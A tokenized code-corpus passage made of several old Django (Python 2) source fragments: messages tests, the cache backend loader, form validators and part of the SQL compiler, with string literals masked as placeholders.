test_high_level ( self ) : <EOL> request = self . get_request ( ) <EOL> storage = self . storage_class ( request ) <EOL> request . _messages = storage <EOL> self . assertTrue ( set_level ( request , <NUM_LIT:30> ) ) <EOL> self . assertEqual ( get_level ( request ) , <NUM_LIT:30> ) <EOL> add_level_messages ( storage ) <EOL> self . assertEqual ( len ( storage ) , <NUM_LIT:2> ) <EOL> def test_settings_level ( self ) : <EOL> request = self . get_request ( ) <EOL> storage = self . storage_class ( request ) <EOL> settings . MESSAGE_LEVEL = <NUM_LIT> <EOL> self . assertEqual ( get_level ( request ) , <NUM_LIT> ) <EOL> add_level_messages ( storage ) <EOL> self . assertEqual ( len ( storage ) , <NUM_LIT:3> ) <EOL> def test_tags ( self ) : <EOL> storage = self . get_storage ( ) <EOL> storage . level = <NUM_LIT:0> <EOL> add_level_messages ( storage ) <EOL> tags = [ msg . tags for msg in storage ] <EOL> self . assertEqual ( tags , <EOL> [ '<STR_LIT:info>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:error>' , <EOL> '<STR_LIT:success>' ] ) <EOL> def test_custom_tags ( self ) : <EOL> settings . MESSAGE_TAGS = { <EOL> constants . INFO : '<STR_LIT:info>' , <EOL> constants . DEBUG : '<STR_LIT>' , <EOL> constants . WARNING : '<STR_LIT>' , <EOL> constants . ERROR : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> } <EOL> base . LEVEL_TAGS = utils . get_level_tags ( ) <EOL> try : <EOL> storage = self . get_storage ( ) <EOL> storage . level = <NUM_LIT:0> <EOL> add_level_messages ( storage ) <EOL> tags = [ msg . tags for msg in storage ] <EOL> self . assertEqual ( tags , <EOL> [ '<STR_LIT:info>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:success>' ] ) <EOL> finally : <EOL> self . restore_setting ( '<STR_LIT>' ) <EOL> base . LEVEL_TAGS = utils . get_level_tags ( ) </s>
<s> """<STR_LIT>""" <EOL> from django . conf import settings <EOL> from django . core import signals <EOL> from django . core . cache . backends . base import ( <EOL> InvalidCacheBackendError , CacheKeyWarning , BaseCache ) <EOL> from django . core . exceptions import ImproperlyConfigured <EOL> from django . utils import importlib <EOL> try : <EOL> from mod_python . util import parse_qsl <EOL> except ImportError : <EOL> try : <EOL> from urlparse import parse_qsl <EOL> except ImportError : <EOL> from cgi import parse_qsl <EOL> __all__ = [ <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> ] <EOL> BACKENDS = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:file>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> DEFAULT_CACHE_ALIAS = '<STR_LIT:default>' <EOL> def parse_backend_uri ( backend_uri ) : <EOL> """<STR_LIT>""" <EOL> if backend_uri . find ( '<STR_LIT::>' ) == - <NUM_LIT:1> : <EOL> raise InvalidCacheBackendError ( "<STR_LIT>" ) <EOL> scheme , rest = backend_uri . split ( '<STR_LIT::>' , <NUM_LIT:1> ) <EOL> if not rest . startswith ( '<STR_LIT>' ) : <EOL> raise InvalidCacheBackendError ( "<STR_LIT>" ) <EOL> host = rest [ <NUM_LIT:2> : ] <EOL> qpos = rest . find ( '<STR_LIT:?>' ) <EOL> if qpos != - <NUM_LIT:1> : <EOL> params = dict ( parse_qsl ( rest [ qpos + <NUM_LIT:1> : ] ) ) <EOL> host = rest [ <NUM_LIT:2> : qpos ] <EOL> else : <EOL> params = { } <EOL> if host . endswith ( '<STR_LIT:/>' ) : <EOL> host = host [ : - <NUM_LIT:1> ] <EOL> return scheme , host , params <EOL> if not settings . CACHES : <EOL> legacy_backend = getattr ( settings , '<STR_LIT>' , None ) <EOL> if legacy_backend : <EOL> import warnings <EOL> warnings . warn ( <EOL> "<STR_LIT>" , <EOL> PendingDeprecationWarning <EOL> ) <EOL> else : <EOL> settings . CACHE_BACKEND = '<STR_LIT>' <EOL> backend_classes = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:file>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> engine , host , params = parse_backend_uri ( settings . CACHE_BACKEND ) <EOL> if engine in backend_classes : <EOL> engine = '<STR_LIT>' % backend_classes [ engine ] <EOL> else : <EOL> engine = '<STR_LIT>' % engine <EOL> defaults = { <EOL> '<STR_LIT>' : engine , <EOL> '<STR_LIT>' : host , <EOL> } <EOL> defaults . update ( params ) <EOL> settings . CACHES [ DEFAULT_CACHE_ALIAS ] = defaults <EOL> if DEFAULT_CACHE_ALIAS not in settings . CACHES : <EOL> raise ImproperlyConfigured ( "<STR_LIT>" % DEFAULT_CACHE_ALIAS ) <EOL> def parse_backend_conf ( backend , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> conf = settings . CACHES . get ( backend , None ) <EOL> if conf is not None : <EOL> args = conf . copy ( ) <EOL> args . update ( kwargs ) <EOL> backend = args . pop ( '<STR_LIT>' ) <EOL> location = args . pop ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> return backend , location , args <EOL> else : <EOL> mod_path , cls_name = backend . rsplit ( '<STR_LIT:.>' , <NUM_LIT:1> ) <EOL> try : <EOL> mod = importlib . import_module ( mod_path ) <EOL> backend_cls = getattr ( mod , cls_name ) <EOL> except ( AttributeError , ImportError ) : <EOL> raise InvalidCacheBackendError ( "<STR_LIT>" % backend ) <EOL> location = kwargs . pop ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> return backend , location , kwargs <EOL> raise InvalidCacheBackendError ( <EOL> "<STR_LIT>" % backend ) <EOL> def get_cache ( backend , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> if '<STR_LIT>' in backend : <EOL> backend , location , params = parse_backend_uri ( backend ) <EOL> if backend in BACKENDS : <EOL> backend = '<STR_LIT>' % BACKENDS [ backend ] <EOL> params . update ( kwargs ) <EOL> mod = importlib . import_module ( backend ) <EOL> backend_cls = mod . CacheClass <EOL> else : <EOL> backend , location , params = parse_backend_conf ( backend , ** kwargs ) <EOL> mod_path , cls_name = backend . rsplit ( '<STR_LIT:.>' , <NUM_LIT:1> ) <EOL> mod = importlib . import_module ( mod_path ) <EOL> backend_cls = getattr ( mod , cls_name ) <EOL> except ( AttributeError , ImportError ) , e : <EOL> raise InvalidCacheBackendError ( <EOL> "<STR_LIT>" % ( backend , e ) ) <EOL> return backend_cls ( location , params ) <EOL> cache = get_cache ( DEFAULT_CACHE_ALIAS ) <EOL> if hasattr ( cache , '<STR_LIT>' ) : <EOL> signals . request_finished . connect ( cache . close ) </s>
<s> import platform <EOL> import re <EOL> import urllib2 <EOL> import urlparse <EOL> from django . core . exceptions import ValidationError <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from django . utils . encoding import smart_unicode <EOL> EMPTY_VALUES = ( None , '<STR_LIT>' , [ ] , ( ) , { } ) <EOL> try : <EOL> from django . conf import settings <EOL> URL_VALIDATOR_USER_AGENT = settings . URL_VALIDATOR_USER_AGENT <EOL> except ImportError : <EOL> URL_VALIDATOR_USER_AGENT = '<STR_LIT>' <EOL> class RegexValidator ( object ) : <EOL> regex = '<STR_LIT>' <EOL> message = _ ( u'<STR_LIT>' ) <EOL> code = '<STR_LIT>' <EOL> def __init__ ( self , regex = None , message = None , code = None ) : <EOL> if regex is not None : <EOL> self . regex = regex <EOL> if message is not None : <EOL> self . message = message <EOL> if code is not None : <EOL> self . code = code <EOL> if isinstance ( self . regex , basestring ) : <EOL> self . regex = re . compile ( regex ) <EOL> def __call__ ( self , value ) : <EOL> """<STR_LIT>""" <EOL> if not self . regex . search ( smart_unicode ( value ) ) : <EOL> raise ValidationError ( self . message , code = self . code ) <EOL> class URLValidator ( RegexValidator ) : <EOL> regex = re . compile ( <EOL> r'<STR_LIT>' <EOL> r'<STR_LIT>' <EOL> r'<STR_LIT>' <EOL> r'<STR_LIT>' <EOL> r'<STR_LIT>' <EOL> r'<STR_LIT>' , re . IGNORECASE ) <EOL> def __init__ ( self , verify_exists = False , <EOL> validator_user_agent = URL_VALIDATOR_USER_AGENT ) : <EOL> super ( URLValidator , self ) . __init__ ( ) <EOL> self . verify_exists = verify_exists <EOL> self . user_agent = validator_user_agent <EOL> def __call__ ( self , value ) : <EOL> try : <EOL> super ( URLValidator , self ) . __call__ ( value ) <EOL> except ValidationError , e : <EOL> if value : <EOL> value = smart_unicode ( value ) <EOL> scheme , netloc , path , query , fragment = urlparse . urlsplit ( value ) <EOL> try : <EOL> netloc = netloc . encode ( '<STR_LIT>' ) <EOL> except UnicodeError : <EOL> raise e <EOL> url = urlparse . urlunsplit ( ( scheme , netloc , path , query , fragment ) ) <EOL> super ( URLValidator , self ) . __call__ ( url ) <EOL> else : <EOL> raise <EOL> else : <EOL> url = value <EOL> if self . verify_exists : <EOL> headers = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : self . user_agent , <EOL> } <EOL> url = url . encode ( '<STR_LIT:utf-8>' ) <EOL> broken_error = ValidationError ( <EOL> _ ( u'<STR_LIT>' ) , code = '<STR_LIT>' ) <EOL> try : <EOL> req = urllib2 . Request ( url , None , headers ) <EOL> req . get_method = lambda : '<STR_LIT>' <EOL> opener = urllib2 . OpenerDirector ( ) <EOL> error_nop = lambda * args , ** kwargs : True <EOL> http_error_processor = urllib2 . HTTPErrorProcessor ( ) <EOL> http_error_processor . http_error_301 = error_nop <EOL> http_error_processor . http_error_302 = error_nop <EOL> http_error_processor . http_error_307 = error_nop <EOL> handlers = [ urllib2 . UnknownHandler ( ) , <EOL> urllib2 . HTTPHandler ( ) , <EOL> urllib2 . HTTPDefaultErrorHandler ( ) , <EOL> urllib2 . FTPHandler ( ) , <EOL> http_error_processor ] <EOL> try : <EOL> import ssl <EOL> handlers . append ( urllib2 . HTTPSHandler ( ) ) <EOL> except : <EOL> pass <EOL> map ( opener . add_handler , handlers ) <EOL> if platform . python_version_tuple ( ) >= ( <NUM_LIT:2> , <NUM_LIT:6> ) : <EOL> opener . open ( req , timeout = <NUM_LIT:10> ) <EOL> else : <EOL> opener . open ( req ) <EOL> except ValueError : <EOL> raise ValidationError ( _ ( u'<STR_LIT>' ) , code = '<STR_LIT>' ) <EOL> except : <EOL> raise broken_error <EOL> def validate_integer ( value ) : <EOL> try : <EOL> int ( value ) <EOL> except ( ValueError , TypeError ) , e : <EOL> raise ValidationError ( '<STR_LIT>' ) <EOL> class EmailValidator ( RegexValidator ) : <EOL> def __call__ ( self , value ) : <EOL> try : <EOL> super ( EmailValidator , self ) . __call__ ( value ) <EOL> except ValidationError , e : <EOL> if value and u'<STR_LIT:@>' in value : <EOL> parts = value . split ( u'<STR_LIT:@>' ) <EOL> domain_part = parts [ - <NUM_LIT:1> ] <EOL> try : <EOL> parts [ - <NUM_LIT:1> ] = parts [ - <NUM_LIT:1> ] . encode ( '<STR_LIT>' ) <EOL> except UnicodeError : <EOL> raise e <EOL> super ( EmailValidator , self ) . __call__ ( u'<STR_LIT:@>' . join ( parts ) ) <EOL> else : <EOL> raise <EOL> email_re = re . compile ( <EOL> r"<STR_LIT>" <EOL> r'<STR_LIT>' <EOL> r'<STR_LIT>' , re . IGNORECASE ) <EOL> validate_email = EmailValidator ( email_re , _ ( u'<STR_LIT>' ) , '<STR_LIT>' ) <EOL> slug_re = re . compile ( r'<STR_LIT>' ) <EOL> validate_slug = RegexValidator ( slug_re , _ ( u"<STR_LIT>" ) , '<STR_LIT>' ) <EOL> ipv4_re = re . compile ( r'<STR_LIT>' ) <EOL> validate_ipv4_address = RegexValidator ( ipv4_re , _ ( u'<STR_LIT>' ) , '<STR_LIT>' ) <EOL> comma_separated_int_list_re = re . compile ( '<STR_LIT>' ) <EOL> validate_comma_separated_integer_list = RegexValidator ( comma_separated_int_list_re , _ ( u'<STR_LIT>' ) , '<STR_LIT>' ) <EOL> class BaseValidator ( object ) : <EOL> compare = lambda self , a , b : a is not b <EOL> clean = lambda self , x : x <EOL> message = _ ( u'<STR_LIT>' ) <EOL> code = '<STR_LIT>' <EOL> def __init__ ( self , limit_value ) : <EOL> self . limit_value = limit_value <EOL> def __call__ ( self , value ) : <EOL> cleaned = self . clean ( value ) <EOL> params = { '<STR_LIT>' : self . limit_value , '<STR_LIT>' : cleaned } <EOL> if self . compare ( cleaned , self . limit_value ) : <EOL> raise ValidationError ( <EOL> self . message % params , <EOL> code = self . code , <EOL> params = params , <EOL> ) <EOL> class MaxValueValidator ( BaseValidator ) : <EOL> compare = lambda self , a , b : a > b <EOL> message = _ ( u'<STR_LIT>' ) <EOL> code = '<STR_LIT>' <EOL> class MinValueValidator ( BaseValidator ) : <EOL> compare = lambda self , a , b : a < b <EOL> message = _ ( u'<STR_LIT>' ) <EOL> code = '<STR_LIT>' <EOL> class MinLengthValidator ( BaseValidator ) : <EOL> compare = lambda self , a , b : a < b <EOL> clean = lambda self , x : len ( x ) <EOL> message = _ ( u'<STR_LIT>' ) <EOL> code = '<STR_LIT>' <EOL> class MaxLengthValidator ( BaseValidator ) : <EOL> compare = lambda self , a , b : a > b <EOL> clean = lambda self , x : len ( x ) <EOL> message = _ ( u'<STR_LIT>' ) <EOL> code = '<STR_LIT:max_length>' </s>
<s> from django . core . exceptions import FieldError <EOL> from django . db import connections <EOL> from django . db . backends . util import truncate_name <EOL> from django . db . models . sql . constants import * <EOL> from django . db . models . sql . datastructures import EmptyResultSet <EOL> from django . db . models . sql . expressions import SQLEvaluator <EOL> from django . db . models . sql . query import get_proxied_model , get_order_dir , select_related_descend , Query <EOL> class SQLCompiler ( object ) : <EOL> def __init__ ( self , query , connection , using ) : <EOL> self . query = query <EOL> self . connection = connection <EOL> self . using = using <EOL> self . quote_cache = { } <EOL> def pre_sql_setup ( self ) : <EOL> """<STR_LIT>""" <EOL> if not self . query . tables : <EOL> self . query . join ( ( None , self . query . model . _meta . db_table , None , None ) ) <EOL> if ( not self . query . select and self . query . default_cols and not <EOL> self . query . included_inherited_models ) : <EOL> self . query . setup_inherited_models ( ) <EOL> if self . query . select_related and not self . query . related_select_cols : <EOL> self . fill_related_selections ( ) <EOL> def quote_name_unless_alias ( self , name ) : <EOL> """<STR_LIT>""" <EOL> if name in self . quote_cache : <EOL> return self . quote_cache [ name ] <EOL> if ( ( name in self . query . alias_map and name not in self . query . table_map ) or <EOL> name in self . query . extra_select ) : <EOL> self . quote_cache [ name ] = name <EOL> return name <EOL> r = self . connection . ops . quote_name ( name ) <EOL> self . quote_cache [ name ] = r <EOL> return r <EOL> def as_sql ( self , with_limits = True , with_col_aliases = False ) : <EOL> """<STR_LIT>""" <EOL> if with_limits and self . query . low_mark == self . query . high_mark : <EOL> return '<STR_LIT>' , ( ) <EOL> self . pre_sql_setup ( ) <EOL> out_cols = self . get_columns ( with_col_aliases ) <EOL> ordering , ordering_group_by = self . get_ordering ( ) <EOL> from_ , f_params = self . get_from_clause ( ) <EOL> qn = self . quote_name_unless_alias <EOL> where , w_params = self . query . where . as_sql ( qn = qn , connection = self . connection ) <EOL> having , h_params = self . query . having . as_sql ( qn = qn , connection = self . connection ) <EOL> params = [ ] <EOL> for val in self . query . extra_select . itervalues ( ) : <EOL> params . extend ( val [ <NUM_LIT:1> ] ) <EOL> result = [ '<STR_LIT>' ] <EOL> if self . query . distinct : <EOL> result . append ( '<STR_LIT>' ) <EOL> result . append ( '<STR_LIT:U+002CU+0020>' . join ( out_cols + self . query . ordering_aliases ) ) <EOL> result . append ( '<STR_LIT>' ) <EOL> result . extend ( from_ ) <EOL> params . extend ( f_params ) <EOL> if where : <EOL> result . append ( '<STR_LIT>' % where ) <EOL> params . extend ( w_params ) <EOL> grouping , gb_params = self . get_grouping ( ) <EOL> if grouping : <EOL> if ordering : <EOL> if not self . connection . features . allows_group_by_pk : <EOL> for col , col_params in ordering_group_by : <EOL> if col not in grouping : <EOL> grouping . append ( str ( col ) ) <EOL> gb_params . extend ( col_params ) <EOL> else : <EOL> ordering = self . connection . ops . force_no_ordering ( ) <EOL> result . append ( '<STR_LIT>' % '<STR_LIT:U+002CU+0020>' . join ( grouping ) ) <EOL> params . extend ( gb_params ) <EOL> if having : <EOL> result . append ( '<STR_LIT>' % having ) <EOL> params . extend ( h_params ) <EOL> if ordering : <EOL> result . append ( '<STR_LIT>' % '<STR_LIT:U+002CU+0020>' . join ( ordering ) ) <EOL> if with_limits : <EOL> if self . query . high_mark is not None : <EOL> result . append ( '<STR_LIT>' % ( self . query . high_mark - self . query . low_mark ) ) <EOL> if self . query . low_mark : <EOL> if self . query . high_mark is None : <EOL> val = self . connection . ops . no_limit_value ( ) <EOL> if val : <EOL> result . append ( '<STR_LIT>' % val ) <EOL> result . append ( '<STR_LIT>' % self . query . low_mark ) <EOL> return '<STR_LIT:U+0020>' . join ( result ) , tuple ( params ) <EOL> def as_nested_sql ( self ) : <EOL> """<STR_LIT>""" <EOL> obj = self . query . clone ( ) <EOL> if obj . low_mark == <NUM_LIT:0> and obj . high_mark is None : <EOL> obj . clear_ordering ( True ) <EOL> obj . bump_prefix ( ) <EOL> return obj . get_compiler ( connection = self . connection ) . as_sql ( ) <EOL> def get_columns ( self , with_aliases = False ) : <EOL> """<STR_LIT>""" <EOL> qn = self . quote_name_unless_alias <EOL> qn2 = self . connection . ops . quote_name <EOL> result = [ '<STR_LIT>' % ( col [ <NUM_LIT:0> ] , qn2 ( alias ) ) for alias , col in self . query . extra_select . iteritems ( ) ] <EOL> aliases = set ( self . query . extra_select . keys ( ) ) <EOL> if with_aliases : <EOL> col_aliases = aliases . copy ( ) <EOL> else : <EOL> col_aliases = set ( ) <EOL> if self . query . select : <EOL> only_load = self . deferred_to_columns ( ) <EOL> for col in self . query . select : <EOL> if isinstance ( col , ( list , tuple ) ) : <EOL> alias , column = col <EOL> table = self . query . alias_map [ alias ] [ TABLE_NAME ] <EOL> if table in only_load and col not in only_load [ table ] : <EOL> continue <EOL> r = '<STR_LIT>' % ( qn ( alias ) , qn ( column ) ) <EOL> if with_aliases : <EOL> if col [ <NUM_LIT:1> ] in col_aliases : <EOL> c_alias = '<STR_LIT>' % len ( col_aliases ) <EOL> result . append ( '<STR_LIT>' % ( r , c_alias ) ) <EOL> aliases . add ( c_alias ) <EOL> col_aliases . add ( c_alias ) <EOL> else : <EOL> result . append ( '<STR_LIT>' % ( r , qn2 ( col [ <NUM_LIT:1> ] ) ) ) <EOL> aliases . add ( r ) <EOL> col_aliases . add ( col [ <NUM_LIT:1> ] ) <EOL> else : <EOL> result . append ( r ) <EOL> aliases . add ( r ) <EOL> col_aliases . add ( col [ <NUM_LIT:1> ] ) <EOL> else : <EOL> result . append ( col . as_sql ( qn , self . connection ) ) <EOL> if hasattr ( col , '<STR_LIT>' ) : <EOL> aliases . add ( col . alias ) <EOL> col_aliases . add ( col . alias ) <EOL> elif self . query . default_cols : <EOL> cols , new_aliases = self . get_default_columns ( with_aliases , <EOL> col_aliases ) <EOL> result . extend ( cols ) <EOL> aliases . update ( new_aliases ) <EOL> max_name_length = self . connection . ops . max_name_length ( ) <EOL> result . extend ( [ <EOL> '<STR_LIT>' % ( <EOL> aggregate . as_sql ( qn , self . connection ) , <EOL> alias is not None <EOL> and '<STR_LIT>' % qn ( truncate_name ( alias , max_name_length ) ) <EOL> or '<STR_LIT>' <EOL> ) <EOL> for alias , aggregate in self . query . aggregate_select . items ( ) <EOL> ] ) <EOL> for table , col in self . query . related_select_cols : <EOL> r = '<STR_LIT>' % ( qn ( table ) , qn ( col ) ) <EOL> if with_aliases and col in col_aliases : <EOL> c_alias = '<STR_LIT>' % len ( col_aliases ) <EOL> result . append ( '<STR_LIT>' % ( r , c_alias ) ) <EOL> aliases . add ( c_alias ) <EOL> col_aliases . add ( c_alias ) <EOL> else : <EOL> result . append ( r ) <EOL> aliases . add ( r ) <EOL> col_aliases . add ( col ) <EOL> self . _select_aliases = aliases <EOL> return result <EOL> def get_default_columns ( self , with_aliases = False , col_aliases = None , <EOL> start_alias = None , opts = None , as_pairs = False , local_only = False ) : <EOL> """<STR_LIT>""" <EOL> result = [ ] <EOL> if opts is None : <EOL> opts = self . query . model . _meta <EOL> qn = self . quote_name_unless_alias <EOL> qn2 = self . connection . ops . quote_name <EOL> aliases = set ( ) <EOL> only_load = self . deferred_to_columns ( ) <EOL> proxied_model = get_proxied_model ( opts ) <EOL> if start_alias : <EOL> seen = { None : start_alias } <EOL> for field , model in opts . get_fields_with_model ( ) : <EOL> if local_only and model is not None : <EOL> continue <EOL> if start_alias : <EOL> try : <EOL> alias = seen [ model ] <EOL> except KeyError : <EOL> if model is proxied_model : <EOL> alias = start_alias <EOL> else : <EOL> link_field = opts . get_ancestor_link ( model ) <EOL> alias = self . query . join ( ( start_alias , model . _meta . db_table , <EOL> link_field . column , model . _meta . pk . column ) ) <EOL> seen [ model ] = alias <EOL> else : <EOL> alias = self . query . included_inherited_models [ model ] <EOL> table = self . query . alias_map [ alias ] [ TABLE_NAME ] <EOL> if table in only_load and field . column not in only_load [ table ] : <EOL> continue <EOL> if as_pairs : <EOL> result . append ( ( alias , field . column ) ) <EOL> aliases . add ( alias ) <EOL> continue <EOL> if with_aliases and field . column in col_aliases : <EOL> c_alias = '<STR_LIT>' % len ( col_aliases ) <EOL> result . append ( '<STR_LIT>' % ( qn ( alias ) , <EOL> qn2 ( field . column ) , c_alias ) ) <EOL> col_aliases . add ( c_alias ) <EOL> aliases . add ( c_alias ) <EOL> else : <EOL> r = '<STR_LIT>' % ( qn ( alias ) , qn2 ( field . column ) ) <EOL> result . append ( r ) <EOL> aliases . add ( r ) <EOL> if with_aliases : <EOL> col_aliases . add ( field . column ) <EOL> return result , aliases <EOL> def get_ordering ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . query . extra_order_by : <EOL> ordering = self . query . extra_order_by <EOL> elif not self . query . default_ordering : <EOL> ordering = self . query . order_by <EOL> else : <EOL> ordering = self . query . order_by or self . query . model . _meta . ordering <EOL> qn = self . quote_name_unless_alias <EOL> qn2 = self . connection . ops . quote_name <EOL> distinct = self . query . distinct <EOL> select_aliases = self . _select_aliases <EOL> result = [ ] <EOL> group_by = [ ] <EOL> ordering_aliases = [ ] <EOL> if self . query . standard_ordering : <EOL> asc , desc = ORDER_DIR [ '<STR_LIT>' ] <EOL> else : <EOL> asc , desc = ORDER_DIR [ '<STR_LIT>' ] <EOL> processed_pairs = set ( ) <EOL> for field in ordering : <EOL> if field == '<STR_LIT:?>' : <EOL> result . append ( self . connection . ops . random_function_sql ( ) ) <EOL> continue <EOL> if isinstance ( field , int ) : <EOL> if field < <NUM_LIT:0> : <EOL> order = desc <EOL> field = - field <EOL> else : <EOL> order = asc <EOL> result . append ( '<STR_LIT>' % ( field , order ) ) <EOL> group_by . append ( ( field , [ ] ) ) <EOL> continue <EOL> col , order = get_order_dir ( field , asc ) <EOL> if col in self . query . aggregate_select : <EOL> result . append ( '<STR_LIT>' % ( qn ( col ) , order ) ) <EOL> continue <EOL> if '<STR_LIT:.>' in field : <EOL> table , col = col . split ( '<STR_LIT:.>' , <NUM_LIT:1> ) <EOL> if ( table , col ) not in processed_pairs : <EOL> elt = '<STR_LIT>' % ( qn ( table ) , col ) <EOL> processed_pairs . add ( ( table , col ) ) <EOL> if not distinct or elt in select_aliases : <EOL> result . append ( '<STR_LIT>' % ( elt , order ) ) <EOL> group_by . append ( ( elt , [ ] ) ) <EOL> elif get_order_dir ( field ) [ <NUM_LIT:0> ] not in self . query . extra_select : <EOL> for table , col , order in self . find_ordering_name ( field , <EOL> self . query . model . _meta , default_order = asc ) : <EOL> if ( table , col ) not in processed_pairs : <EOL> elt = '<STR_LIT>' % ( qn ( table ) , qn2 ( col ) ) <EOL> processed_pairs . add ( ( table , col ) ) <EOL> if distinct and elt not in select_aliases : <EOL> ordering_aliases . append ( elt ) <EOL> result . append ( '<STR_LIT>' % ( elt , order ) ) <EOL> group_by . append ( ( elt , [ ] ) ) <EOL> else : <EOL> elt = qn2 ( col ) <EOL> if distinct and col not in select_aliases : <EOL> ordering_aliases . append ( elt ) <EOL> result . append ( '<STR_LIT>' % ( elt , order ) ) <EOL> group_by . append ( self . query . extra_select [ col ] ) <EOL> self . query . ordering_aliases = ordering_aliases <EOL> return result , group_by <EOL> def find_ordering_name ( self , name , opts , alias = None , default_order = '<STR_LIT>' , <EOL> already_seen = None ) : <EOL> """<STR_LIT>""" <EOL> name , order = get_order_dir ( name , default_order ) <EOL> pieces = name . split ( LOOKUP_SEP ) <EOL> if not alias : <EOL> alias = self . query . get_initial_alias ( ) <EOL> field , target , opts , joins , last , extra = self . query . setup_joins ( pieces , <EOL> opts , alias , False ) <EOL> alias = joins [ - <NUM_LIT:1> ] <EOL> col = target . column <EOL> if not field . rel : <EOL> self . query . ref_alias ( alias ) <EOL> self . query . promote_alias_chain ( joins , <EOL> self . query . alias_map [ joins [ <NUM_LIT:0> ] ] [ JOIN_TYPE ] == self . query . LOUTER ) <EOL> if field . rel and len ( joins ) > <NUM_LIT:1> and opts . ordering : <EOL> if not already_seen : <EOL> already_seen = set ( ) <EOL> join_tuple = tuple ( [ self . query . alias_map [ j ] [ TABLE_NAME ] for j in joins ] ) <EOL> if join_tuple in already_seen : <EOL> raise FieldError ( '<STR_LIT>' ) <EOL> already_seen . add ( join_tuple ) <EOL> results = [ ] <EOL> for item in opts . ordering : <EOL> results . extend ( self . find_ordering_name ( item , opts , alias , <EOL> order , already_seen ) ) <EOL> return results <EOL> if alias : <EOL> while <NUM_LIT:1> : <EOL> join = self . query . alias_map [ alias ] <EOL> if col != join [ RHS_JOIN_COL ] : <EOL> break <EOL> self . query . unref_alias ( alias ) <EOL> alias = join [ LHS_ALIAS ] <EOL> col = join [ LHS_JOIN_COL ] <EOL> return [ ( alias , col , order ) ] <EOL> def get_from_clause ( self ) : <EOL> """<STR_LIT>""" <EOL> result = [ ] <EOL> qn = self . quote_name_unless_alias <EOL> qn2 = self . connection . ops . quote_name <EOL> first = True <EOL> for alias in self . query . tables : <EOL> if not self . query . alias_refcount [ alias ] : <EOL> continue <EOL> try : <EOL> name , alias , join_type , lhs , lhs_col , col , nullable = self . query . alias_map [ alias ] <EOL> except KeyError : <EOL> continue <EOL> alias_str = ( alias != name and '<STR_LIT>' % alias or '<STR_LIT>' ) <EOL> if join_type and not first : <EOL> result . append ( '<STR_LIT>' <EOL> % ( join_type , qn ( name ) , alias_str , qn ( lhs ) , <EOL> qn2 ( lhs_col ) , qn ( alias ) , qn2 ( col ) ) ) <EOL> else : <EOL> connector = not first and '<STR_LIT:U+002CU+0020>' or '<STR_LIT>' <EOL> result . append ( '<STR_LIT>' % ( connector , qn ( name ) , alias_str ) ) <EOL> first = False <EOL> for t in self . query . extra_tables : <EOL> alias , unused = self . query . table_alias ( t ) <EOL> if alias not in self . query . alias_map or self . query . alias_refcount [ alias ] == <NUM_LIT:1> : <EOL> connector = not first and '<STR_LIT:U+002CU+0020>' or '<STR_LIT>' <EOL> result . append ( '<STR_LIT>' % ( connector , qn ( alias ) ) ) <EOL> first = False <EOL> return result , [ ] <EOL> def get_grouping ( self ) : <EOL> """<STR_LIT>""" <EOL> qn = self . quote_name_unless_alias <EOL> result , params = [ ] , [ ] <EOL> if self . query . group_by is not None : <EOL> if ( len ( self . query . model . _meta . fields ) == len ( self . query . select ) and <EOL> self . connection . features . allows_group_by_pk ) : <EOL> self . query . group_by = [ <EOL> ( self . query . model . _meta . db_table , self . query . model . _meta . pk . column ) <EOL> ] <EOL> group_by = self . query . group_by or [ ] <EOL> extra_selects = [ ] <EOL> for extra_select , extra_params in self . query . extra_select . itervalues ( ) : <EOL> extra_selects . append ( extra_select ) <EOL> params . extend ( extra_params ) <EOL> cols = ( group_by + self . query . select + <EOL> self . query . related_select_cols + extra_selects ) <EOL> for col in cols : <EOL> if isinstance ( col , ( list , tuple ) ) : <EOL> result . append ( '<STR_LIT>' % ( qn ( col [ <NUM_LIT:0> ] ) , qn ( col [ <NUM_LIT:1> ] ) ) ) <EOL> elif hasattr ( col , '<STR_LIT>' ) : <EOL> result . append ( col . as_sql ( qn , self . connection ) ) <EOL> else : <EOL> result . append ( '<STR_LIT>' % str ( col ) ) <EOL> return result , params <EOL> def fill_related_selections ( self , opts = None , root_alias = None , cur_depth = <NUM_LIT:1> , <EOL> used = None , requested = None , restricted = None , nullable = None , <EOL> dupe_set = None , avoid_set = None ) : <EOL> """<STR_LIT>""" <EOL> if not restricted and self . query . max_depth and cur_depth > self . query . max_depth : <EOL> return <EOL> if not opts : <EOL> opts = self . query . get_meta ( ) <EOL> root_alias = self . query . get_initial_alias ( ) <EOL> self . query . related_select_cols = [ ] <EOL> self . query . related_select_fields = [ ] <EOL> if not used : <EOL> used = set ( ) <EOL> if dupe_set is None : <EOL> dupe_set = set ( ) <EOL> if avoid_set is None : <EOL> avoid_set = set ( ) <EOL> orig_dupe_set = dupe_set <EOL> if requested is None : <EOL> if isinstance ( self . query . select_related , dict ) : <EOL> requested = self . query . select_related <EOL> restricted = True <EOL> else : <EOL> restricted = False <EOL> for f , model in opts . get_fields_with_model ( ) : <EOL> if not select_related_descend ( f , restricted , requested ) : <EOL> continue <EOL> avoid = avoid_set . copy ( ) <EOL> dupe_set = orig_dupe_set . copy ( ) <EOL> table = f 